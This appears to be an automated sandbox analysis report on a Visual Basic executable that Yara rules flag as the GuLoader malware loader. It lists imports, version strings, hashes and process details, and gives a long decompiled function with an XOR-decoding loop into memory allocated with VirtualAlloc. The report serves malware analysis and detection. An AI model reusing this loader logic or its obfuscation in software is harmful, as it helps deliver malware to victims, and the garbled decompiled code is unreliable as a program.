_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Blver
FileVersion	1.00
CompanyName	Mortagage
Comments	Mortagage
ProductName	Mortagage
ProductVersion	1.00
FileDescription	Mortagage
OriginalFilename	Blver.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: d81yNmZHaE.exe PID: 5416 Parent PID: 5696

General

Start time:	15:19:54
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\d81yNmZHaE.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\d81yNmZHaE.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	74B1969D9F41C94A1A07431B65BBF390
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000000.00000000.234240857.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: d81yNmZHaE.exe PID: 5416 Parent PID: 5696 d81yNmZHaE.exeCOMMON

Executed Functions

Function 004055DB, Relevance: 12.6, APIs: 1, Strings: 7, Instructions: 568
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E004055DB(void* __ebx, signed char __edx, intOrPtr* __esi) {
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				signed char _t70;
				signed char _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				signed int _t84;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed char _t95;
				intOrPtr* _t97;
				signed int _t98;
				intOrPtr* _t99;
				intOrPtr* _t100;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr* _t105;
				signed int _t122;
				intOrPtr* _t129;
				intOrPtr* _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t150;
				intOrPtr* _t151;
				intOrPtr* _t152;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr* _t169;
				intOrPtr* _t176;
				intOrPtr* _t177;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				intOrPtr* _t184;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t194;
				intOrPtr* _t195;
				intOrPtr* _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr* _t214;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t226;
				signed char _t229;
				signed char _t230;
				void* _t231;
				signed int _t236;
				signed int _t246;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				void* _t253;
				signed int _t254;
				intOrPtr* _t381;
				signed char _t383;
				signed char _t390;

				_t250 = __esi;
				_t244 = __edx;
				_t229 =  *(__esi - 0x20) * 0x383c0db9;
				asm("clc");
				if(_t229 < 0) {
					 *((intOrPtr*)(_t229 + 0x552ebac1)) =  *((intOrPtr*)(_t229 + 0x552ebac1)) + 0x83;
					_t236 = (_t229 ^ 0xffffffff9150a3b4) - 0xe4126620 + 0x5e349cad;
					do {
						_t122 = 0 ^ _t236;
						_t236 = _t236 + 1;
					} while (_t122 != 0x536fd28);
					_t129 =  *((intOrPtr*)(0x40100c));
					do {
						_t129 = _t129 + 0xffffffff;
						asm("pushfd");
						asm("popfd");
					} while ( *_t129 != 0x5d66bbae);
					VirtualAlloc(0xd22b52c7, 0x10000, 0xd22b52c7, 0x40); // executed
					_t250 = 0x83;
					_t244 = 0x40591d;
					_t226 = 0xbfec;
					_t246 = 0xcc8cb76d;
					do {
						 *(_t250 + _t226) = 0 ^  *(_t244 + _t226);
						 *(_t250 + _t226) =  *(_t250 + _t226) ^ _t246;
						_t226 = _t226 - 0x242 + 0x23e;
					} while (_t226 >= 0);
					goto __esi;
				}
				asm("sbb [ebx], al");
				_t144 = __ebx +  *0x83;
				_t39 = 0x83 +  *_t144;
				asm("sbb [ebx], al");
				_t145 = _t144 +  *_t39;
				_t40 = _t39 +  *_t145;
				asm("sbb [ebx], al");
				_t146 = _t145 +  *_t40;
				_t41 = _t40 +  *_t146;
				asm("sbb [ebx], al");
				_t147 = _t146 +  *_t41;
				_t42 = _t41 +  *_t147;
				asm("sbb [ebx], al");
				_t148 = _t147 +  *_t42;
				_t43 = _t42 +  *_t148;
				asm("sbb [ebx], al");
				_t149 = _t148 +  *_t43;
				_t44 = _t43 +  *_t149;
				asm("sbb [ebx], al");
				_t150 = _t149 +  *_t44;
				_t45 = _t44 +  *_t150;
				asm("sbb [ebx], al");
				_t151 = _t150 +  *_t45;
				_t46 = _t45 +  *_t151;
				asm("sbb [ebx], al");
				_t152 = _t151 +  *_t46;
				_t47 = _t46 +  *_t152;
				asm("sbb [ebx], al");
				_t251 = __esi + _t253;
				asm("cmpsd");
				 *0x8cb76dfc =  *0x8cb76dfc >> _t229;
				asm("daa");
				_t154 = _t152 +  *_t47 +  *_t47;
				_t48 = _t47 +  *_t154;
				asm("sbb [ebx], al");
				_t155 = _t154 +  *_t48;
				_t49 = _t48 +  *_t155;
				asm("sbb [ebx], al");
				_t156 = _t155 +  *_t49;
				_t50 = _t49 +  *_t156;
				asm("sbb [ebx], al");
				_t157 = _t156 +  *_t50;
				_t51 = _t50 +  *_t157;
				asm("sbb [ebx], al");
				_t158 = _t157 +  *_t51;
				_t52 = _t51 +  *_t158;
				asm("sbb [ebx], al");
				_t159 = _t158 +  *_t52;
				_t53 = _t52 +  *_t159;
				asm("sbb [ebx], al");
				_t160 = _t159 +  *_t53;
				_t54 = _t53 +  *_t160;
				asm("sbb [ebx], al");
				_t161 = _t160 +  *_t54;
				asm("sbb [ebx], al");
				_t56 = _t54 +  *((intOrPtr*)(_t160 +  *_t54)) +  *((intOrPtr*)(_t161 +  *((intOrPtr*)(_t54 +  *((intOrPtr*)(_t160 +  *_t54))))));
				asm("sbb [ebx], al");
				ds =  *((intOrPtr*)(_t246 + 0x2d + _t56 * 2));
				0x3180303 = _t253;
				_t230 = 0x27;
				_pop(_t254);
				_t57 = _t56 +  *0x3c798c07;
				asm("sbb [ebx], al");
				_t58 = _t57 +  *0x3c798c07;
				asm("sbb [ebx], al");
				_t59 = _t58 +  *0x3c798c07;
				asm("sbb [ebx], al");
				_t60 = _t59 +  *0x3c798c07;
				asm("sbb [ebx], al");
				_t61 = _t60 +  *0x3c798c07;
				asm("sbb [ebx], al");
				_t169 = 0x3c798c07 +  *_t57 +  *_t58 +  *_t59 +  *_t60 +  *_t61;
				while(1) {
					L10:
					_t62 = _t61 +  *_t169;
					asm("sbb [ebx], al");
					_t170 = _t169 +  *_t62;
					asm("sbb [ebx], al");
					_t64 = _t62 +  *((intOrPtr*)(_t169 +  *_t62)) +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_t62 +  *((intOrPtr*)(_t169 +  *_t62))))));
					asm("sbb [ebx], al");
					asm("ror dword [0x788d235], 1");
					do {
						_t64 = _t64 ^ 0xcc0788d2;
						_push(0x3180303);
					} while (_t64 > 0);
					asm("out 0xef, al");
					asm("movsb");
					_t246 = _t246 - 1;
					_t65 = _t251;
					_t251 = _t64;
					_t66 = _t65;
					asm("in al, 0x22");
					asm("insd");
					_push(ss);
					asm("aas");
					asm("les ebp, [edi-0x49]");
					 *((intOrPtr*)(_t244 + _t254 * 8)) = fs;
					asm("int3");
					_push(_t251);
					asm("jecxz 0xffffffaa");
					asm("enter 0x6f18, 0x7");
					asm("invalid");
					_t176 = 0x8c +  *_t66;
					_t67 = _t66 +  *_t176;
					asm("sbb [ebx], al");
					_t177 = _t176 +  *_t67;
					_t68 = _t67 +  *_t177;
					asm("sbb [ebx], al");
					_t178 = _t177 +  *_t68;
					_t69 = _t68 +  *_t178;
					asm("sbb [ebx], al");
					_t179 = _t178 +  *_t69;
					_t70 = _t69 +  *_t179;
					asm("sbb [ebx], al");
					while(1) {
						_t180 = _t179 +  *_t70;
						_t71 = _t70 +  *_t180;
						asm("sbb [ebx], al");
						_t181 = _t180 +  *_t71;
						while(1) {
							L14:
							asm("sbb [ebx], al");
							_t182 = _t181 +  *_t71;
							_t72 = _t71 +  *_t182;
							asm("sbb [ebx], al");
							_t169 = _t182 +  *_t72;
							_t61 = _t72 +  *_t169;
							_t381 = _t61;
							asm("sbb [eax-0x7e], cl");
							if(_t381 != 0) {
								goto L10;
							}
							asm("int3");
							_pop(0x3180303);
							if(_t381 <= 0) {
								_t230 = _t230 ^  *(_t246 + 0x55278cb3);
								_t61 = _t61 +  *_t169;
							}
							asm("sbb [ebx], al");
							_t183 = _t169 +  *_t61;
							_t73 = _t61 +  *_t183;
							asm("sbb [ebx], al");
							_t184 = _t183 +  *_t73;
							_t74 = _t73 +  *_t184;
							asm("sbb [ebx], al");
							_t185 = _t184 +  *_t74;
							_t75 = _t74 +  *_t185;
							asm("sbb [ebx], al");
							_t186 = _t185 +  *_t75;
							_t76 = _t75 +  *_t186;
							asm("sbb [ebx], al");
							_t187 = _t186 +  *_t76;
							_t77 = _t76 +  *_t187;
							asm("sbb [ebx], al");
							_t188 = _t187 +  *_t77;
							_t78 = _t77 +  *_t188;
							asm("sbb [ebx], al");
							_t189 = _t188 +  *_t78;
							_t79 = _t78 +  *_t189;
							asm("sbb [ebx], al");
							_t190 = _t189 +  *_t79;
							_t80 = _t79 +  *_t190;
							asm("sbb [ebx], al");
							_t179 = _t190 +  *_t80;
							_t70 = _t80 +  *_t179;
							_t383 = _t70;
							if(_t383 <= 0) {
								_t180 = _t179 +  *_t70;
								_t71 = _t70 +  *_t180;
								asm("sbb [ebx], al");
								_t181 = _t180 +  *_t71;
								continue;
							}
							asm("cmpsb");
							if(_t383 == 0) {
								_t246 = _t246 + 1;
								asm("sbb [ebx-0x69378978], edx");
								_t71 = _t70 & 0x0000001b;
								asm("in al, dx");
								if(_t71 != 0) {
									continue;
								} else {
									_pop(ss);
									_t254 = _t254 + 1 - 1;
									_push(0xb7cd448e);
									asm("daa");
									_t244 = _t244 + 1;
									asm("out 0xf, eax");
									_t230 = _t230 +  *((intOrPtr*)(_t254 + 0x345ec16)) |  *(_t246 - 0x2f);
									asm("pslld mm5, [ebp-0x3e]");
									_push(_t246);
									_push(cs);
									_t251 =  *(_t246 + 0x318f067) * 0x3031803;
									asm("sbb [ebx], al");
									_t211 = _t179 -  *0x709ad23a +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t212 = _t211 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t213 = _t212 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t214 = _t213 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t215 = _t214 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t216 = _t215 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t217 = _t216 +  *0x709ad23a;
									asm("sbb [ebx], al");
									_t218 = _t217 +  *0x709ad23a;
									_t70 = 0x709ad23a +  *_t211 +  *_t212 +  *_t213 +  *_t214 +  *_t215 +  *_t216 +  *_t217 +  *_t218;
									asm("sbb [ebx], al");
									_t179 = _t218 +  *0x709ad23a;
								}
							}
							asm("sbb [ebx], al");
							_t231 = _t230 +  *_t179;
							_t81 = _t70 + 1;
							_pop(_t248);
							asm("rcl bh, 1");
							_t249 = _t248 |  *(_t231 - 0x4fa307cf);
							asm("sbb [ebx], al");
							_t191 = _t179 +  *_t81;
							_t82 = _t81 +  *_t191;
							asm("sbb [ebx], al");
							_t192 = _t191 +  *_t82;
							_t83 = _t82 +  *_t192;
							asm("sbb [ebx], al");
							_t193 = _t192 +  *_t83;
							_t84 = _t83 +  *_t193;
							asm("sbb [ebx], al");
							do {
								_t194 = _t193 +  *_t84;
								_t85 = _t84 +  *_t194;
								asm("sbb [ebx], al");
								_t195 = _t194 +  *_t85;
								_t86 = _t85 +  *_t195;
								asm("sbb [ebx], al");
								_t196 = _t195 +  *_t86;
								_t87 = _t86 +  *_t196;
								asm("sbb [ebx], al");
								_t197 = _t196 +  *_t87;
								_t88 = _t87 +  *_t197;
								asm("sbb [ebx], al");
								_t198 = _t197 +  *_t88;
								_t89 = _t88 +  *_t198;
								asm("sbb [ebx], al");
								_t199 = _t198 +  *_t89;
								_t90 = _t89 +  *_t199;
								asm("sbb [ebx], al");
								_t193 = _t199 +  *_t90;
								asm("rcl bh, 1");
								asm("adc ebx, esi");
								asm("stc");
								asm("adc bl, [edi+0x4b]");
								asm("int3");
								asm("in al, 0x50");
								_t95 = _t90 +  *_t193 + 0xc13c4589 | 0x8cb66d08;
								_t390 = _t95;
								do {
									asm("in al, 0xf0");
									asm("movsb");
									asm("hlt");
									asm("cdq");
									es =  *((intOrPtr*)(_t193 + _t249 - 0x56));
									_push(0x8c);
									asm("aas");
								} while (_t390 < 0);
								 *(_t249 + 0xd057d49) =  *(_t249 + 0xd057d49) | _t95;
								asm("in al, dx");
								_t231 = _t231 + 1;
								asm("in al, dx");
								_t244 = 0x8c << 0xed;
								_t84 = _t95 ^  *(_t251 + _t249 * 4) | 0x9f4b423a;
								_push(_t251);
								asm("in al, dx");
							} while (_t84 >= 0);
							asm("fsubr qword [ebp-0x49]");
							asm("lock sbb [bp+di], al");
							_t200 = _t193 +  *_t84;
							_t97 = _t84 +  *_t200;
							asm("sbb [ebx], al");
							_t201 = _t200 +  *_t97;
							_t98 = _t97 +  *_t201;
							asm("sbb [ebx], al");
							_t202 = _t201 +  *_t98;
							do {
								_t99 = _t98 +  *_t202;
								asm("sbb [ebx], al");
								_t203 = _t202 +  *_t99;
								_t100 = _t99 +  *_t203;
								asm("sbb [ebx], al");
								_t204 = _t203 +  *_t100;
								_t101 = _t100 +  *_t204;
								asm("sbb [ebx], al");
								_t205 = _t204 +  *_t101;
								_t102 = _t101 +  *_t205;
								asm("sbb [ebx], al");
								_t206 = _t205 +  *_t102;
								_t103 = _t102 +  *_t206;
								asm("sbb [ebx], al");
								_t207 = _t206 +  *_t103;
								_t104 = _t103 +  *_t207;
								asm("sbb [ebx], al");
								_t208 = _t207 +  *_t104;
								_t105 = _t104 +  *_t208;
								asm("sbb [ebx], al");
								_t202 = _t208 +  *_t105;
								_t98 = _t105 +  *_t202 |  *(_t105 +  *_t202 + 0x4f);
								asm("movsb");
								_pop(_t254);
							} while (_t98 < 0);
							asm("popfd");
							return _t98;
						}
						goto L10;
					}
				}
			}

0x004055db
0x004055db
0x004055db
0x004055e4
0x004055e5
0x004055eb
0x0040561f
0x00405629
0x00405675
0x0040567b
0x00405688
0x004056e4
0x00405744
0x0040574f
0x0040575a
0x0040575b
0x0040575b
0x004058a3
0x004058ac
0x004058b2
0x004058be
0x004058c7
0x004058cc
0x004058e6
0x004058f2
0x0040590e
0x0040590e
0x00405915
0x00405915
0x0040f3e5
0x0040f3e7
0x0040f3e9
0x0040f3eb
0x0040f3ed
0x0040f3ef
0x0040f3f1
0x0040f3f3
0x0040f3f5
0x0040f3f7
0x0040f3f9
0x0040f3fb
0x0040f3fd
0x0040f3ff
0x0040f401
0x0040f403
0x0040f405
0x0040f407
0x0040f409
0x0040f40b
0x0040f40d
0x0040f40f
0x0040f411
0x0040f413
0x0040f415
0x0040f417
0x0040f419
0x0040f41b
0x0040f41f
0x0040f421
0x0040f422
0x0040f428
0x0040f42a
0x0040f42c
0x0040f42e
0x0040f430
0x0040f432
0x0040f434
0x0040f436
0x0040f438
0x0040f43a
0x0040f43c
0x0040f43e
0x0040f440
0x0040f442
0x0040f444
0x0040f446
0x0040f448
0x0040f44a
0x0040f44c
0x0040f44e
0x0040f450
0x0040f452
0x0040f454
0x0040f458
0x0040f45c
0x0040f45e
0x0040f462
0x0040f46e
0x0040f46f
0x0040f471
0x0040f472
0x0040f474
0x0040f478
0x0040f47a
0x0040f47e
0x0040f480
0x0040f484
0x0040f486
0x0040f48a
0x0040f48c
0x0040f48e
0x0040f490
0x0040f490
0x0040f490
0x0040f492
0x0040f494
0x0040f498
0x0040f49c
0x0040f49e
0x0040f4a2
0x0040f4a4
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ad
0x0040f4af
0x0040f4b0
0x0040f4b1
0x0040f4b1
0x0040f4b4
0x0040f4b5
0x0040f4b9
0x0040f4bc
0x0040f4bd
0x0040f4c0
0x0040f4c3
0x0040f4c8
0x0040f4c9
0x0040f4ca
0x0040f4cc
0x0040f4d0
0x0040f4d8
0x0040f4da
0x0040f4dc
0x0040f4de
0x0040f4e0
0x0040f4e2
0x0040f4e4
0x0040f4e6
0x0040f4e8
0x0040f4ea
0x0040f4ec
0x0040f4ee
0x0040f4f0
0x0040f4f0
0x0040f4f2
0x0040f4f4
0x0040f4f6
0x0040f4f7
0x0040f4f7
0x0040f4f7
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f4ff
0x0040f501
0x0040f501
0x0040f503
0x0040f506
0x00000000
0x00000000
0x0040f508
0x0040f509
0x0040f50a
0x0040f50c
0x0040f512
0x0040f512
0x0040f514
0x0040f516
0x0040f518
0x0040f51a
0x0040f51c
0x0040f51e
0x0040f520
0x0040f522
0x0040f524
0x0040f526
0x0040f528
0x0040f52a
0x0040f52c
0x0040f52e
0x0040f530
0x0040f532
0x0040f534
0x0040f536
0x0040f538
0x0040f53a
0x0040f53c
0x0040f53e
0x0040f540
0x0040f542
0x0040f544
0x0040f546
0x0040f548
0x0040f548
0x0040f54a
0x0040f4f0
0x0040f4f2
0x0040f4f4
0x0040f4f6
0x00000000
0x0040f4f6
0x0040f54d
0x0040f54e
0x0040f550
0x0040f551
0x0040f557
0x0040f559
0x0040f55a
0x00000000
0x0040f55c
0x0040f567
0x0040f56f
0x0040f570
0x0040f57b
0x0040f57d
0x0040f586
0x0040f588
0x0040f58b
0x0040f58f
0x0040f590
0x0040f591
0x0040f59b
0x0040f59d
0x0040f5a1
0x0040f5a3
0x0040f5a7
0x0040f5a9
0x0040f5ad
0x0040f5af
0x0040f5b3
0x0040f5b5
0x0040f5b9
0x0040f5bb
0x0040f5bf
0x0040f5c1
0x0040f5c5
0x0040f5c7
0x0040f5c9
0x0040f5cb
0x0040f5cd
0x0040f5cd
0x0040f55a
0x0040f5ce
0x0040f5d0
0x0040f5d2
0x0040f5d4
0x0040f5d8
0x0040f5da
0x0040f5e0
0x0040f5e2
0x0040f5e4
0x0040f5e6
0x0040f5e8
0x0040f5ea
0x0040f5ec
0x0040f5ee
0x0040f5f0
0x0040f5f2
0x0040f5f4
0x0040f5f4
0x0040f5f6
0x0040f5f8
0x0040f5fa
0x0040f5fc
0x0040f5fe
0x0040f600
0x0040f602
0x0040f604
0x0040f606
0x0040f608
0x0040f60a
0x0040f60c
0x0040f60e
0x0040f610
0x0040f612
0x0040f614
0x0040f616
0x0040f618
0x0040f628
0x0040f62a
0x0040f62c
0x0040f62d
0x0040f638
0x0040f639
0x0040f63b
0x0040f63b
0x0040f63f
0x0040f641
0x0040f643
0x0040f644
0x0040f645
0x0040f646
0x0040f64a
0x0040f64b
0x0040f64b
0x0040f64e
0x0040f659
0x0040f65a
0x0040f65b
0x0040f65c
0x0040f65f
0x0040f664
0x0040f665
0x0040f665
0x0040f668
0x0040f66b
0x0040f66f
0x0040f671
0x0040f673
0x0040f675
0x0040f677
0x0040f679
0x0040f67b
0x0040f67d
0x0040f67d
0x0040f67f
0x0040f681
0x0040f683
0x0040f685
0x0040f687
0x0040f689
0x0040f68b
0x0040f68d
0x0040f68f
0x0040f691
0x0040f693
0x0040f695
0x0040f697
0x0040f699
0x0040f69b
0x0040f69d
0x0040f69f
0x0040f6a1
0x0040f6a3
0x0040f6a5
0x0040f6a9
0x0040f6ac
0x0040f6ad
0x0040f6ad
0x0040f6b1
0x0040f6b4
0x0040f6b4
0x00000000
0x0040f4f7
0x0040f4f0

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,-408DF805,0415E3AA), ref: 004058A3

Strings

{, xrefs: 00405626
Z, xrefs: 004056C2
C, xrefs: 004056FF
u, xrefs: 00405752
=, xrefs: 004056DB
a, xrefs: 00405668
!, xrefs: 00405678

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocVirtual
String ID: !$=$C$Z$a$u${
API String ID: 4275171209-2975839822
Opcode ID: 65760874c0c41d2ce465c62194ef7cb2998c93bf00c147bf9ea8dccdc941dc1f
Instruction ID: 340d2c4084046b8af932e976a2e2a974fa02c1e103b209f14026b5d1a42f7800
Opcode Fuzzy Hash: 65760874c0c41d2ce465c62194ef7cb2998c93bf00c147bf9ea8dccdc941dc1f
Instruction Fuzzy Hash: CA22EB351553A18FEB22CB69DCC2B593BB1EF07710B2849DBC481CF65ADA29A058DB13

Uniqueness

Uniqueness Score: -1.00%

Function 022D6827, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 694memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(13F6EFC7,?,122DA41B), ref: 022D6A8D

Strings

W, xrefs: 022D55D3
Ai 8, xrefs: 022D68DC
DC, xrefs: 022D558B

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: Ai 8$DC$W
API String ID: 2167126740-3538345327
Opcode ID: d58a5837c8c7ef7d81cb426cb300112148aba67fef85d1d9b391de2202cb42a3
Instruction ID: 295730fe6ffcd5dbaf1fcfb4b809e4892b3dcd7c93fcd427940a8537c3ae9894
Opcode Fuzzy Hash: d58a5837c8c7ef7d81cb426cb300112148aba67fef85d1d9b391de2202cb42a3
Instruction Fuzzy Hash: AE52ED71618349DFDB749F74CC857EABBA2FF59310F958129D88A9B224C3B45A80CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00401C10, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 672COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401C15

Strings

VB5!6&*, xrefs: 00401C10

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 60b04d2d54b6fc70dddf62626a85be56cbcc98b0bb48c78847bfd2c78017cf59
Instruction ID: 02c76d5026c522f7d45e7137f63294a84413b36713714acde343bdcf7d19f446
Opcode Fuzzy Hash: 60b04d2d54b6fc70dddf62626a85be56cbcc98b0bb48c78847bfd2c78017cf59
Instruction Fuzzy Hash: E612522148E3D19FD7039B749CA65A27FB0AE1321431E46EBC4C1CF0B3E22D695AD766

Uniqueness

Uniqueness Score: -1.00%

Function 022D6884, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(13F6EFC7,?,122DA41B), ref: 022D6A8D

Strings

Ai 8, xrefs: 022D68DC

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: Ai 8
API String ID: 2167126740-4167863511
Opcode ID: 68784df3b53b39f0b9ffe57159b37512a89d7e40928184932d6b7d83397fe3c7
Instruction ID: 7d620babffaa2bb31ccb94a925a580b09698ab2b34c5e31406cbdb7b172204b5
Opcode Fuzzy Hash: 68784df3b53b39f0b9ffe57159b37512a89d7e40928184932d6b7d83397fe3c7
Instruction Fuzzy Hash: E641A0B0514385CFCB749E78EC957FE7BB5EF19340F91452AD8899A225C3344A84CF46

Uniqueness

Uniqueness Score: -1.00%

Function 022D68C9, Relevance: 1.6, APIs: 1, Instructions: 105memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(13F6EFC7,?,122DA41B), ref: 022D6A8D

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 868c72022abedc8e8c395e9e1ab8b04d8dc90ecb2eb29606f9673e67d142f0d2
Instruction ID: 0b59d2e24ffa5c4724be2a41ec1d083250c9eab1c996cdea451f5cb539b9660d
Opcode Fuzzy Hash: 868c72022abedc8e8c395e9e1ab8b04d8dc90ecb2eb29606f9673e67d142f0d2
Instruction Fuzzy Hash: B841FEB1518385CFCB309E78EC957EE7BB5EF1A344F94452AD8899B225C3348A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022D6911, Relevance: 1.6, APIs: 1, Instructions: 93memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(13F6EFC7,?,122DA41B), ref: 022D6A8D

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4670629def3efc658c96bee59b2c00ef44f06e515b795c7817469f872e9276cd
Instruction ID: 5faced8ec21ba99812052f6a823065e32d640e0f72d417cd6c3d6059e079cac8
Opcode Fuzzy Hash: 4670629def3efc658c96bee59b2c00ef44f06e515b795c7817469f872e9276cd
Instruction Fuzzy Hash: 1631ACB0654389DFCB709E78EC947EE7BB5EF09340F90452AD9899B225C3348A84CF42

Uniqueness

Uniqueness Score: -1.00%

Function 022D6955, Relevance: 1.6, APIs: 1, Instructions: 88memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(13F6EFC7,?,122DA41B), ref: 022D6A8D

Memory Dump Source

